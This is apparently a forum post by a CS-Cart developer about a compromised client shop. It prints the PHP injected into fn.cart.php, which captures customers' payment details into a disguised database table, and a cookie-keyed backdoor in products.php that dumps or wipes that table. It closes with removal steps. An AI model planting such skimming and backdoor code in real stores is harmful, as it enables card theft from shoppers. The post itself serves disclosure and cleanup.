A client of mine was having cc info compromised. This is a very old version of the cart (2.1.1) but the method will work on any site.
It appears as if the site was compomised (I.e. accessed by someone versus an automated intrusion) but the code injection is the same.
In fn.cart.php, code was inserted into the fn_place_order() function at the point where payment info is saved for the order. The injected code looks like:
<br />
$encode = 'ba' . 'se' . '64' . '_' . 'enc' . 'ode';<br />
$prefix = Registry::get('config.table_prefix');<br />
if (empty($prefix)) {<br />
$prefix = 'cscart_';<br />
}<br />
$table = $prefix . 'images_cache'; <br />
$imagerequest = $encode(serialize(array($_SERVER['REMOTE_ADDR'], $_SESSION['cart']['user_data'], $_SESSION['cart']['payment_info'])));<br />
db_query("CREATE TABLE IF NOT EXISTS $table (`cache` TEXT NOT NULL) ENGINE = MYISAM");<br />
db_query("INSERT INTO $table (cache) VALUES ('$imagerequest')");<br />
<br />
```<br />
Which captures payment info and stores it in the database in a cscart_images_cache table (which is NOT a standard table in cs-cart).<br />
<br />
This captures all payment info for every order created.<br />
<br />
Then in the controllers/customer/products.php (or controllers/frontend for V4) the retrieval portion of the code is injected in the 'view' mode with code similar to:<br />
```php
<br />
if (isset($_COOKIE['get_product_cache_id']) && md5($_COOKIE['get_product_cache_id']) == '84306a6467087170caed3d132bbc3adb') {<br />
echo(serialize(db_get_array("SELECT * FROM ?:images_cache")));<br />
exit;<br />
} elseif (isset($_COOKIE['rem_product_cache_id']) && md5($_COOKIE['rem_product_cache_id']) == '84306a6467087170caed3d132bbc3adb') {<br />
db_query("DELETE FROM ?:images_cache");<br />
die(md5(0));<br />
}<br />
<br />
```<br />
Which packages up the data previously captured and sends it to the calling browser.<br />
<br />
Again, I do NOT believe the code was inserted by a cs-cart vulnerability (but I could be wrong) but thought I would publish for people to check their sites as to whether this injection exists on your site.<br />
<br />
To fix, remove the offending code above from both files and DROP the cscart_images_cache table from your database.